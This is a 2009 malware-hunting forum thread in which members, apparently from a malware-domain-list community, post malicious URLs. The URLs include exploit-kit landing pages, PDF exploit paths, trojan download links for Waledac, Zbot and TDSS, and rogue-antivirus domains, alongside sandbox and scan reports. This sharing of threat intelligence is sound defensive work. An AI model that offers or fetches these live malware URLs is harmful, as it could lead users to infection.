betstarwager.cn/in.cgi?cocacola74
bizoplata.ru/1/in.php
bizoplata.ru/1/load.php?id=1
bizoplata.ru/1/load.php?id=6
bizoplata.ru/1/pdf.php
bizoplata.ru/exchange.html
bizoplata.ru/funt.html
bizoplata.ru/pay.html
bizoplata.ru/s/in.cgi?5
bizoplata.ru/topcurs.html
botconnet.cn/nuc/index.php
bulkbin.cn/in.cgi?2&group=dns01&seoref=Âmeter=$keyword&keyword=$keyword&se=$se&ur=1
clearadvare2008.cn/in.cgi?8
clickcouner.cn/?117f66bf567c1382b6d7ba2ad370c82ce78ed4c3c24b143599e9a15b876c0f9b20470530a0e11f40f1a5d5da8ed912c4d5236110653fafd952640bf635e837e2
clickcouner.cn/?3a8f76910fa0181ba6b5479a46825e4cafb742be29b6894b397da137363bed3cc794a770116e95afe10b7c4c5c4bb4ebcd2454a0636855f26e77bf36f0b47146
clickcouner.cn/?54cea7d7c7682f27df5070357c7a60e747f1b261e4d5d55b9fd8f8880e4a525ee4fc4b965e78fbbe4587ec538b22c2a078d2218a087d7a1b2fda9cff3739a4c2
clickcouner.cn/?8cc76fb22005a8b936b886a6800f481da000c0c523a044a870836623e8daea4f679f86f35ca39c72a0482f6675a1a126d9c13b9073fb6c36b82873e1c9394baf
clickcouner.cn/?t=5
d1gix.net/forum/index.php
d1gix.net/forum/load.php?id=1301
d1gix.net/forum/load.php?id=1301&spl=4
d1gix.net/forum/pdf.php?id=1301
desktoprepairpackage.com/secure/3e448f5c3098045f42569da80c168ea7/49b6f34a/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
desktoprepairpackage.com/secure/9417212421c1fb9821e530ddbd2b7c34/49b6f21e/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
download.advancesoftwaretool.com/secure/4308c3fd58e7dabcf7f5ffd3b21eca90/49ba4ac1/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
download.desktoprepairpackage.com/secure/3e448f5c3098045f42569da80c168ea7/49b6f34a/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
download.desktoprepairpackage.com/secure/9417212421c1fb9821e530ddbd2b7c34/49b6f21e/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
dlmaldef09.com/maldef09/install.php?track_id=10232
drebopoer.com/embded/mess_add.txt
drebopoer.com/embded/online.php?id=444884634282223285838277238378&country=United%20States
drebopoer.com/embded/redirect_fake.txt
drebopoer.com/embded/search_fid.txt
drebopoer.com/kept.exe
firstgate.ru/stat/404.php
firstgate.ru/stat/flash.php
firstgate.ru/stat/getexe.php?h=11
firstgate.ru/stat/traff.php
gowayscan.com/?uid=12405
gujjipuzzi.net/in.cgi?pipka2
gujjipuzzi.net/su/in.cgi?19
hayboxiw.cn/nuc/exe.php
hayboxiw.cn/nuc/index.php
hs.3-46.zlkon.lv/40E8000879B9FABC48B65F576C0000014166000000007600000177EB00053059300FA4
ipredator.ru/7/in.cgi?3
ipredator.ru/7/in.cgi?default
in4co.com/cki.php?uid=12405
in4ik.com/download/InternetAntivirusPro.exe
litedownloadseek.cn/in.cgi?cocacola25
litedownloadseek.cn/in.cgi?cocacola26
pakras.com/fky/3rkour.dat
pakras.com/fky/mp.dat
pakras.com/fky/zro.dat
pakras.com/n2by3ywf/404.php
pakras.com/n2by3ywf/flash.php
pakras.com/n2by3ywf/getexe.php?h=11
pakras.com/n2by3ywf/info.php
pakras.com/n2by3ywf/pdf.exp.php
pakras.com/ntmx13a5/404.php
pakras.com/ntmx13a5/flash.php
pakras.com/ntmx13a5/info.php
pakras.com/ntmx13a5/pdf.exp.php
reddii.ru/traffic/sploit1/?130ybabVxtxdd
reddii.ru/traffic/sploit1/getexe.php?h=11
reddii.ru/traffic/sploit1/getfile.php?f=pdf
reddii.ru/traffic/sploit1/getfile.php?f=vispdf
rotateonads.com/files/1000.exe
rotateonads.com/files/MPh.exe
sexbases.cn/gr.php
sexbases.cn/in.cgi?20
sexbases.cn/vas.php
sexbases.cn/wed.html
strhq.cn/tds_a/go.php?id=2
thehugetitstop.cn/1/in.php
thehugetitstop.cn/1/load.php?id=1
thehugetitstop.cn/1/load.php?id=6
thehugetitstop.cn/1/load.php?id=3
thehugetitstop.cn/1/pdf.php
thehugetitstop.cn/answer.html
thehugetitstop.cn/dontstop.html
thehugetitstop.cn/newsstop.html
thehugetitstop.cn/s/in.cgi?5
thehugetitstop.cn/soundthis.html
tombak-story.comimages/pics/system/load.php?id=33577
tombak-story.comimages/pics/system/pdf.php?id=33577
tombak-story.com/images/pics/system/index.php
tozxiqud.cn/in.cgi?2
tozxiqud.cn/in.cgi?4
tozxiqud.cn/nuc/exe.php
tozxiqud.cn/nuc/index.php
traf.asia/stat.php
trypetstore.cn/file1.exe
trypetstore.cn/in.php
trypetstore.cn/nop/tds2.php
trypetstore.cn/robo/f/123.exe
trypetstore.cn/robo/files/tasks/AC
trypetstore.cn/robo/robo.php?r=1
trypetstore.cn/robo/robo.php?r=4
trypetstore.cn/robo/robo.php?r=5
trypetstore.cn/robo/robo.php?r=6
trypetstore.cn/sploits/pdf.php?id=2
usa.amerika.by/1.exe
vpsspeedin.ru/1/in.php
vpsspeedin.ru/1/load.php?id=3
vpsspeedin.ru/1/pdf.php
www.abdomains.cn/multi/bact.php
www.abdomains.cn/multi/bcmd.php
www.abdomains.cn/multi/checkupdate.php
www.abdomains.cn/multi/dirlist.php
www.abdomains.cn/multi/filelist.php
www.abdomains.cn/multi/getemails.php
www.abdomains.cn/multi/isho.txt
www.abdomains.cn/multi/takida.txt
z.lovertoorcn.cn/cp/l/5/bb810243e44b3a69d8de712f1976a635
z.lovertoorcn.cn/cp/r/5/bb810243e44b3a69d8de712f1976a635
z.lovertoorcn.cn/cp/t
zatura.cn/prohit/demon.bin
zatura.cn/prohit/source.php
zatura.cn/sad/demo.exe
zlzu.ru/damma/index.php
zlzu.ru/damma/load.php
xoomer.alice.it/hogroves/file.exe
xoomer.alice.it/hogroves/InternetAntivirusPro.exe

e.see-something.cn/m/l/0/3d4f38cb2f508d50c37678cfffb60492
e.see-something.cn/m/l/3/7d9b68a88bc55148e1ab6f92be144574
e.see-something.cn/m/l/4/c30eebe3a7c0158a45a4f3966ffd2216
e.see-something.cn/m/l/6/74a2593a472f17e2e0a7f5be342b2371
e.see-something.cn/m/r/0/3d4f38cb2f508d50c37678cfffb60492
e.see-something.cn/m/r/3/7d9b68a88bc55148e1ab6f92be144574
e.see-something.cn/m/r/4/c30eebe3a7c0158a45a4f3966ffd2216
e.see-something.cn/m/r/6/74a2593a472f17e2e0a7f5be342b2371
e.see-something.cn/m/t


www.microsoft.com.v6.update.js.status200.should-be.cn/
www.microsoft.com.v6.update.js.status200.should-be.cn/ar.cn
www.microsoft.com.v6.update.js.status200.should-be.cn/m/l/13/aa3119ba7581b0bf3e5b4b3c7eb63f63
www.microsoft.com.v6.update.js.status200.should-be.cn/m/l/18/93aeb808d1c98aee14aef249486f1430
www.microsoft.com.v6.update.js.status200.should-be.cn/m/r/13/aa3119ba7581b0bf3e5b4b3c7eb63f63
www.microsoft.com.v6.update.js.status200.should-be.cn/m/r/18/93aeb808d1c98aee14aef249486f1430
www.microsoft.com.v6.update.js.status200.should-be.cn/m/t
www.microsoft.com.v6.update.js.status200.should-be.cn/p/o/o.php?2
www.microsoft.com.v6.update.js.status200.should-be.cn/st6.php
www.microsoft.com.v6.update.js.status200.should-be.cn/support.cn/forum.php
www.microsoft.com.v6.update.js.status200.should-be.cn/support.cn/index.php
www.microsoft.com.v6.update.js.status200.should-be.cn/support.cn/javac.php


Just some playing around stuff, nothing too serious.  ;)
Title: Re: daily something......
Post by: SysAdMini on March 24, 2009, 07:40:03 pm
Some of my dingleberries from last few weeks  :P

Just some playing around stuff, nothing too serious.  ;)

Looks like a long night for me.  ;) You did that on MWR some weeks ago. I had a lot of fun for a whole day.  :)
Title: Re: daily something......
Post by: sowhat-x on March 24, 2009, 08:26:53 pm
...Santa Claus is coming to town...

 ;D
Title: Re: daily something......
Post by: sowhat-x on March 24, 2009, 10:26:21 pm
Code: [Select]
hxxp://239.by.ru
hxxp://4r.by.ru
hxxp://666-project.by.ru
hxxp://adminmail.by.ru
hxxp://ahf.by.ru
hxxp://ak-sh.by.ru
hxxp://aster2005.by.ru
hxxp://autolg.by.ru
hxxp://avsimirc.by.ru
hxxp://beliy-medved.by.ru
hxxp://belsoch.by.ru
hxxp://belsurgery.by.ru
hxxp://big-mass.by.ru
hxxp://bulkin.by.ru
hxxp://ekaterininskay-shcool.by.ru
hxxp://extreme-ski.by.ru
hxxp://hrunsky.by.ru
hxxp://lakkmus.by.ru
hxxp://liceysk.by.ru
hxxp://margotour.by.ru
hxxp://medievalmusic.by.ru
hxxp://misham.by.ru
hxxp://muric.by.ru
hxxp://normforum.by.ru
hxxp://ochakovo.by.ru
hxxp://ondeep.by.ru
hxxp://poxe.by.ru
hxxp://rbook.by.ru
hxxp://rushops.by.ru
hxxp://sfchgu.by.ru
hxxp://team-sleep.by.ru
hxxp://testpoligon.by.ru
hxxp://thp8.by.ru
hxxp://wraith-pony.by.ru
hxxp://www.gvozd.by.ru

Now let's see to whom supposedly "all of the bases are belong to...",heh...i say in return, 1 ip to rule them all:
http://www.bfk.de/bfk_dnslogger_en.html?query=87.242.78.57#result
Title: Re: daily something......
Post by: sowhat-x on March 24, 2009, 10:42:39 pm
CM_MWR brought me up in a good mood (as he usually does),
so I thought of sharing the joy with others as well...   ;)
http://www.google.com/search?hl=en&q=%22Index+of+%2F%22+mhstchk.php
Title: Re: daily something......
Post by: CM_MWR on March 25, 2009, 02:48:11 am
Has been a few moons, hasnt it.  ;D
Title: Re: daily something......
Post by: sowhat-x on March 25, 2009, 09:46:19 am
Open dir,these are the ones that caught my attention though...
Quote
hxxp://glush.by.ru/agang.jar
http://www.virustotal.com/analisis/b50e6d91d682919f664d1b412fe51e7b
Quote
hxxp://glush.by.ru/settlers.jar
http://www.virustotal.com/analisis/0d4e1b9b172ba3663b2d5aeb8b39d3d2
========================
Quote
hxxp://javacsript.net/index/in.cgi?5
http://wepawet.iseclab.org/view.php?hash=237b6aae1fd55cb5517943b187f43488&t=1237979819&type=js
--->
Quote
hxxp://newsantimalware.com/412/
hxxp://newsantimalware.com/412/iepdf.php?f=new
hxxp://newsantimalware.com/412/load.php
---> Result: 5/40 (12.50%) :
http://www.virustotal.com/analisis/38b38ade6b7d019c5d0aa2f7c6f937d7
========================
Quote
hxxp://ayurvedaservicesindia.we.bs
http://wepawet.iseclab.org/view.php?hash=9f43c950049303a60e3755f92a9f07d1&t=1237981067&type=js

Quote
hxxp://extraspray.com/in.php?
hxxp://agkt.info/evo/count.php?o=7
========================
Quote
hxxp://drmituayurvedatreatments.we.bs
http://wepawet.iseclab.org/view.php?hash=761f6eb37181b4c5221f4b98340e194d&t=1237981408&type=js

Quote
hxxp://ftp.shmurge.com/get.php?id='
hxxp://stat.zima07.ru
hxxp://get.zima07.ru/pdf.php?acc=1
hxxp://get.zima07.ru/swf.php
hxxp://ftp.zima07.ru/run.php
hxxp://get.load-flash.com/out.php?click

There might be more crap in the same ip,haven't checked that though...
http://www.bfk.de/bfk_dnslogger_en.html?query=66.40.56.10#result
Title: Re: daily something......
Post by: CkreM on March 25, 2009, 01:40:21 pm
av fraud:


Code: [Select]
goscanfull.comredirect in the end to:
Code: [Select]
http://fusescan4.com/download/install.php
Code: [Select]
goscanplan.comredirect in the end to:
Code: [Select]
http://wayscan4.com/download/install.php

this ip is full of av fraud domains..

http://www.bfk.de/bfk_dnslogger_en.html?query=78.159.101.27#result
Title: Re: daily something......
Post by: sowhat-x on March 25, 2009, 07:06:26 pm
Quote
hxxp://ghthchinalimited.com.cn/admin/controller.php?action=bot&entity_list=
hxxp://turokgame.cn/bm/controller.php?action=bot&entity_list=

Quote
hxxp://attmyjoker.com/if/index.php
Title: Re: daily something......
Post by: CkreM on March 25, 2009, 10:17:05 pm
Waledac:
Code: [Select]
http://bestjournalguide.com/run.exe
http://urbanfear.com/run.exe
http://globalantiterror.com/run.exe

Redirects to exploits:
Code: [Select]
paintball2.by.ruhttp://wepawet.iseclab.org/view.php?hash=8e522d049a6411492d6ddea2013a3c47&t=1238017604&type=js

Contain iframe of pdf exploit:
Code: [Select]
http://29ka.by.ru/http://wepawet.iseclab.org/view.php?hash=5ba619da85a609ec2942b6e0417a728b&t=1238018761&type=js

the pfd exploit:
Code: [Select]
http://expresstv.co.il/un/pdf.phphttp://wepawet.iseclab.org/view.php?hash=98a40fb7fd2a5a04cb12d788d2c4665c&t=1238018870&type=js

the trojan he download:
Code: [Select]
http://expresstv.co.il/un/load.phphttp://www.virustotal.com/analisis/8f452239eb342ba3decd28a6ff241465

AV fraud:
Code: [Select]
vistastabilitynow.com
vistastabilitynow.net
scanalertspage.com
onlinescanservice.com
getscanonline.com
bestfiresfull.com
fuckmoneycash.com
bestfiresfull.com
yourstabilitysystem.com
popularpcscan.com
mostpopularscan.com
scanvistanow.net
Title: Re: daily something......
Post by: CM_MWR on March 26, 2009, 09:27:04 am
Quote
the trojan he download:

What happens if its a transexual piece of malware  ???   :D
Title: Re: daily something......
Post by: CkreM on March 26, 2009, 01:15:08 pm
Quote
the trojan he download:

What happens if its a transexual piece of malware  ???   :D

i will change it to "it" for all the feminists here :P
Title: Re: daily something......
Post by: CkreM on March 26, 2009, 01:29:34 pm
Redirect to exploits:
Code: [Select]
http://baltstroi-spb.by.ruhttp://wepawet.iseclab.org/view.php?hash=d99f501d81c87b6e690fcd9147b6118e&t=1238072608&type=js

redirect to exploits:
Code: [Select]
http://hotjob.by.ruhttp://wepawet.iseclab.org/view.php?hash=dd67f744942bd4dfb62ca592269c85f7&t=1238072560&type=js

exploits and waledac Trojan in the end at:
Code: [Select]
http://dolpassgiven.ru/3/pdf.php
http://dolpassgiven.ru/3/load.php?id=3

http://www.virustotal.com/analisis/88095c3f38020917145ca045f5adbc60
http://anubis.iseclab.org/?action=result&task_id=120a06c16ed33fec4b9fb4b2a80db328e&format=html
Title: Re: daily something......
Post by: CkreM on March 26, 2009, 05:54:22 pm
Redirects to exploits:
Code: [Select]
http://vniic.by.ruhttp://wepawet.iseclab.org/view.php?hash=8578df10b9d0f8b53bb43a7b193b68c4&t=1238083841&type=js

exploits/Trojan Waledac:
Code: [Select]
http://dasretokfin.com/include/spl.phphttp://wepawet.iseclab.org/view.php?hash=d8ebd3a3d6bf7c41126a81b490f96294&t=1238084290&type=js
Code: [Select]
http://dasretokfin.com/load.phphttp://www.virustotal.com/analisis/c91540f8abbf3f49e981edb486790a25
---------------------------------------------
Redirects to exploits:
Code: [Select]
http://rootastic.by.ruhttp://wepawet.iseclab.org/view.php?hash=94d6673b07ddb8e91f85b0885415ab56&t=1238083887&type=js

Redirects to exploits:
Code: [Select]
http://gav-posad.by.ruhttp://wepawet.iseclab.org/view.php?hash=a137e822fc9460ba0006c09b97c5483e&t=1238084673&type=js

Redirects to exploits:
Code: [Select]
http://fastfood.by.ruhttp://wepawet.iseclab.org/view.php?hash=0f14d3e37ad232de59cd7b7b686486ae&t=1238085115&type=js

Redirects to exploits:
Code: [Select]
http://nemiroff.by.ruhttp://wepawet.iseclab.org/view.php?hash=5a96bc55863a40a5cbc20e87fda449b7&t=1238087155&type=js

Redirects to exploits:
Code: [Select]
http://kkff.by.ruhttp://wepawet.iseclab.org/view.php?hash=61bf7c4aae87094f6ff6d3b9b419f130&t=1238087090&type=js

Redirects to exploits:
Code: [Select]
http://amirag.by.ruhttp://wepawet.iseclab.org/view.php?hash=67052be5d4655c2ee3aca176fde97b25&t=1238087608&type=js
Title: Re: daily something......
Post by: SysAdMini on March 26, 2009, 06:24:19 pm
Redirects to exploits:
Code: [Select]
http://vniic.by.ru
Code: [Select]
http://rootastic.by.ru
Code: [Select]
http://gav-posad.by.ru
Code: [Select]
http://fastfood.by.ru
Code: [Select]
http://nemiroff.by.ru
Code: [Select]
http://kkff.by.ru
Code: [Select]
http://amirag.by.ru

All of them are at the same host :

http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=87.242.78.57&colsearch=All&ascordesc=DESC&quantity=50&page=0

Whos has time to check more domains from this ip ?

http://www.bfk.de/bfk_dnslogger.html?query=87.242.78.57#result
Title: Re: daily something......
Post by: CkreM on March 26, 2009, 09:24:56 pm
Redirects to exploits:
Code: [Select]
http://vniic.by.ru
Code: [Select]
http://rootastic.by.ru
Code: [Select]
http://gav-posad.by.ru
Code: [Select]
http://fastfood.by.ru
Code: [Select]
http://nemiroff.by.ru
Code: [Select]
http://kkff.by.ru
Code: [Select]
http://amirag.by.ru

All of them are at the same host :

http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=87.242.78.57&colsearch=All&ascordesc=DESC&quantity=50&page=0

Whos has time to check more domains from this ip ?

http://www.bfk.de/bfk_dnslogger.html?query=87.242.78.57#result

thats what ive been doing in the last few days :)
think i covered like 70% :P
Title: Re: daily something......
Post by: XiTri on March 27, 2009, 02:24:45 am
Code: [Select]
http://rifnasax.cn/nuc/index.php
http://rifnasax.cn/nuc/spl/pdf.pdf
http://rifnasax.cn/nuc/exe.php
may be offline
Code: [Select]
http://livestats.co.cc/script.js
Title: Re: daily something......
Post by: SysAdMini on March 28, 2009, 05:53:35 pm
Code: [Select]
http://krona98.biz/opi/http://wepawet.cs.ucsb.edu/view.php?hash=03236ee924ddc9d03c2f11d176e3775c&t=1238262446&type=js

Code: [Select]
http://krona98.biz/opi/load.php?id=4http://www.virustotal.com/analisis/0f51acface4b59ccc14b48cd92beaaac 1/39
VBA32    3.12.10.1    2009.03.27    Worm.Win32.AutoRun.oik
Title: Re: daily something......
Post by: XiTri on March 29, 2009, 06:54:46 am
Code: [Select]
http://ru98.biz/cgi-bin/wtsin.cgi?id=4
http://krona98.biz/ins/index.php
http://krona98.biz/myy/cache/readme.pdf
http://krona98.biz/myy/cache/flash.swf
http://krona98.biz/myy/load.php?id=4
http://krona98.biz/myy/load.php?id=5
Title: Re: daily something......
Post by: CkreM on March 30, 2009, 12:07:51 pm

rogue:

Code: [Select]
http://systemsecuritytool.com
http://system-tuner.net
http://getpcguard.com
http://systemsecurityonline.com

exploits+trojan:
Code: [Select]
http://blufda.com/
http://wepawet.iseclab.org/view.php?hash=9f5b70106e995d5f7a4e842f54cc3c29&t=1238414305&type=js
Title: Re: daily something......
Post by: CM_MWR on March 30, 2009, 06:48:57 pm
Code: [Select]
http://216.12.168.138/1/getexe.php?h=11
http://216.12.168.138/1/getfile.php?f=pdf
http://216.12.168.138/1/helper.xml
http://66.90.101.177/ldr/files/part.exe
http://66.90.101.177/ldr/files/minisvr4.exe
http://66.90.101.177/ldr/files/zchMiB.exe
http://basesrv.net/base/install.lib
http://basesrv.net/base/ntdll.exe
http://basesrv.net/bin/in.php
http://basesrv.net/bin/load.php?id=1
http://basesrv.net/bin/load.php?id=6
http://basesrv.net/bin/pdf.php
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1&cc=0
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1&cc=0&cc=0
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1&cc=0&cc=0&cc=0
http://basesrv.net/update/delcache.exe
http://basesrv.net/update/load.exe
http://basesrv.net/update/loader_del.exe
http://basesrv.net/update/svchost.exe
http://bestfindahome.cn/findmeale.html
http://bestfindahome.cn/home.html
http://bestfindahome.cn/searchn.html
http://bizoplata.ru/monitoring.html
http://bizoplata.ru/onservice.html
http://bizoplata.ru/pay.html
http://nameashop.cn/in.cgi?income13
http://newsantimalware.com/720/load.php
http://nikodomain.info/in/init.php
http://pakras.com/c6p7fnqd/404.php
http://pakras.com/c6p7fnqd/flash.php
http://pakras.com/c6p7fnqd/getexe.php?h=11
http://pakras.com/c6p7fnqd/info.php
http://pakras.com/c6p7fnqd/pdf.exp.php
http://pakras.com/las/3rkour.dat
http://pakras.com/las/mp.dat
http://pakras.com/las/tos.dat
http://rec.bestrevenue.net/get_93.php?p=148
http://rec.bestrevenue.net/get_93.php?p=152
http://rec.bestrevenue.net/get_93.php?p=155
http://rec.bestrevenue.net/get_93.php?p=156
http://rec.bestrevenue.net/get_93.php?p=157
http://rec.bestrevenue.net/get_93.php?p=162
http://reddii.ru/traffic/sploit1/?263bYYYbaYtbt
http://reddii.ru/traffic/sploit1/getexe.php?h=11
http://reddii.ru/traffic/sploit1/getfile.php?f=swf
http://rifnasax.cn/nuc/exe.php
http://rifnasax.cn/nuc/index.php
http://rifnasax.cn/nuc/spl/pdf.pdf
http://sadcwed.hostindianet.com/cache/flash.swf
http://sadcwed.hostindianet.com/cache/readme.pdf
http://sadcwed.hostindianet.com/index.php
http://teleporn.net/fix.exe?id=EB52EAEE-B8A4-45F1-AE06-1918472E1B0D
http://teleporn.net/rep.php?id=EB52EAEE-B8A4-45F1-AE06-1918472E1B0D
http://teleporn.net/stat/cache/flash.swf
http://teleporn.net/stat/cache/readme.pdf
http://teleporn.net/stat/index.php
http://teleporn.net/stat/load.php?id=0
http://teleporn.net/stat/load.php?id=4
http://ultradant.cn/dis9/index.php
http://ultradant.cn/dis9/load.php
http://zzzz.hostindianet.com/load.php?id=0
http://zzzz.hostindianet.com/load.php?id=4

Code: [Select]
http://66.90.101.177/ldr/files/minisvr4.exe
http://66.90.101.177/ldr/files/part.exe
http://66.90.101.177/ldr/files/zchMiB.exe
http://74.55.52.170/p1212/2.0/w.bin?226179
http://92.62.101.118/40E8001430303030303030303030303030303030303031306C0000003766000000007600000642EB0005302663788C
http://92.62.101.118/40E8001430303030303030303030303030303030303031306C0000016666000000007600000642EB0005301D414F5C
http://94.247.2.122/2.gif?nocache=0.3735362
http://94.247.2.122/2.gif?nocache=0.9495566
http://94.247.2.122/2.gif?nocache=1.401764E-02

Code: [Select]
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/china.cn/
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/l/15/02c9be1ab189280058cd0585b0abebc8
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/l/3/275eefe4b40b934bedd87eb81b293bfd
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/r/15/02c9be1ab189280058cd0585b0abebc8
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/r/3/275eefe4b40b934bedd87eb81b293bfd
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/t
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/g/g.php?1
forwrd.h15.ru/
forwrd.h15.ru/g/ch.gif?funnyst8

oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/l/13/85cd1675de836a8cbe767019adf63929
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/l/15/6e107936d7e25cee0060e938e9b23a2a
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/l/3/fa49ddccad9bc56cd081c69078d04b8e
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/r/13/85cd1675de836a8cbe767019adf63929
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/r/15/6e107936d7e25cee0060e938e9b23a2a
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/r/3/fa49ddccad9bc56cd081c69078d04b8e
oligarh.territory.ru.b3675abf54988eef.axa3.cn/cp/t
oligarh.territory.ru.b3675abf54988eef.axa3.cn/elanguage.cn/
oligarh.territory.ru.b3675abf54988eef.axa3.cn/g/g.php?1
Title: Re: daily something......
Post by: CkreM on March 30, 2009, 10:22:27 pm
exploits/trojan:
Code: [Select]
pro100biz.cn/yes/index.phphttp://wepawet.iseclab.org/view.php?hash=56cb05532164e0c797b9860ec0bd7f9b&t=1238446331&type=js

Title: Re: daily something......
Post by: GmG on March 31, 2009, 11:14:51 am
Code: [Select]
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe
Title: Re: daily something......
Post by: SysAdMini on March 31, 2009, 11:31:12 am
Code: [Select]
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe

already added some days ago.  ;)

http://www.malwaredomainlist.com/mdl.php?search=steer2.co.uk&colsearch=All&quantity=50
Title: Re: daily something......
Post by: GmG on March 31, 2009, 01:00:55 pm
Code: [Select]
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe

already added some days ago.  ;)

http://www.malwaredomainlist.com/mdl.php?search=steer2.co.uk&colsearch=All&quantity=50

Sorry  :'(

Rootkit TDSS
Code: [Select]
http://91.207.61.180/images/138/v3/file.exe

Code: [Select]
http://kxc-softwaresportal.com/promo.exe
http://updateserver.info/loads/traff.exe
http://updateserver.info/loads/instcash.exe
http://f-o-r.ms/xpre.tmp
http://f-o-r.ms/xrun.tmp

Mebroot
Code: [Select]
http://1681online.com/ld/dx/
http://wepawet.cs.ucsb.edu/view.php?hash=79ec6e02b38cad246c44c87dbeb4c2c6&t=1238508047&type=js

Rogue on googlecode like
http://sunbeltblog.blogspot.com/2009/03/google-code-site-used-as-malware.html

Code: [Select]
http://vlrm.googlecode.com/svn/trunk/
http://ultra-av.googlecode.com/svn/trunk/

Refpron
Code: [Select]
http://174.133.72.250/p1212/2.0/w.bin

Code: [Select]
http://mnnz.biz/ar/
http://mnnz.biz/ar/exe.php
Title: Re: daily something......
Post by: sowhat-x on March 31, 2009, 01:13:00 pm
f-o-r.ms -> seems we've got a jackpot here,heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result
Title: Re: daily something......
Post by: GmG on March 31, 2009, 01:14:48 pm
f-o-r.ms -> seems we've got a jackpot here,heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result

Malicious Advertising, xrun.exe - xpre.exe and friends
http://www.bluetack.co.uk/forums/index.php?showtopic=18462
 ;)
Title: Re: daily something......
Post by: sowhat-x on March 31, 2009, 01:25:46 pm
Lol,Bluetack is pretty much one of the best english-speaking malware hunting forums out there,
but it doesn't really get the attention that it should from the security community unfortunately...  :(
Title: Re: daily something......
Post by: SysAdMini on March 31, 2009, 02:01:44 pm
f-o-r.ms -> seems we've got a jackpot here,heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result

Malicious Advertising, xrun.exe - xpre.exe and friends
http://www.bluetack.co.uk/forums/index.php?showtopic=18462
 ;)

Ok, Marcel Heler and friends. Well known. ;)
Title: Re: daily something......
Post by: Mr Clean on March 31, 2009, 03:35:44 pm
Hi everyone, I'm a newbie here.  Just want to say hi!

I really like this site and I'm embarrassed that I didn't start to appreciate it sooner. 

Anyway, on a daily  basis I run across all sorts of crazy stuff and I'm sure you do too.   This bizarre little goodie just flashed on my screen so I thought I'd post it here to see what ya think.    ???

Code: [Select]
POST / HTTP/1.0
TagId: xxxxxxxxxxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: search.namequery.com
Content-Length: 15
Pragma: no-cache
Via: 1.1 localhost:80 (squid)
Cache-Control: max-age=259200
Connection: keep-alive

~G.....p...o.\~HTTP/1.0 200 OK

Server: Microsoft-IIS/6.0
Content-Type: image/jpeg
Content-Length: 553
Connection: Close
TagId: xxxxxxxxxxx


~. ....MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

Any insight would be appreciated   :)

The binary is attached.
Title: Re: daily something......
Post by: sowhat-x on March 31, 2009, 04:10:30 pm
"binary3" unfortunately seems to be download-corrupted,ie.it's not a valid executable...
Did you grab it via a POST request?
Title: Re: daily something......
Post by: Mr Clean on March 31, 2009, 04:21:20 pm
"binary3" unfortunately seems to be download-corrupted,ie.it's not a valid executable...
Did you grab it via a POST request?

No, I pulled it from a pcap.  Yeah, I noticed that it's broken.  The squid proxy likely killed it.     What I find bizarre is that it's a POST request, and the server responded by pushing down an apparent binary with a Content-Type: image/jpeg.   This isn't exactly normal behaviour.   Does anyone have anything on the domain "search.namequery.com"?
Title: Re: daily something......
Post by: sowhat-x on March 31, 2009, 04:36:03 pm
Google returns a few bad history records from what it seems...
http://www.bfk.de/bfk_dnslogger.html?query=209.53.113.223#result
http://www.google.com/search?q=209.53.113.223
Title: Re: daily something......
Post by: Mr Clean on March 31, 2009, 04:52:02 pm
Google returns a few bad history records from what it seems...
http://www.bfk.de/bfk_dnslogger.html?query=209.53.113.223#result
http://www.google.com/search?q=209.53.113.223

Ok, this is generated by a program call "computrace" by absolute software.  It's laptop "lojack" software
Title: Re: daily something......
Post by: CkreM on March 31, 2009, 05:08:56 pm
Zbot,domain on MDL but different path this time:

Code: [Select]
http://amnepofig.ru/test/config.bin
http://amnepofig.ru/test/loader.exe
Title: Re: daily something......
Post by: sowhat-x on April 01, 2009, 12:53:45 am
Quote
hxxp://bublik.biz/in.cgi?2 // Newer domain hosted over at 88.198.48.247...

Redirects to ->
Quote
hxxp://cximnik.cn/img2/index.php // Already spotted in previous days...pdf exploits etc.
= = = = = = = = = = = = = = = = =

Quote
hxxp://basesrv3.net/update/main.exe
Result: 9/40 (22.5%):
http://www.virustotal.com/analisis/bc75d1265dcad80564f03cfb3cc1e1ae
Title: Re: daily something......
Post by: CkreM on April 01, 2009, 12:07:46 pm
Exploit/Trojan:
Code: [Select]
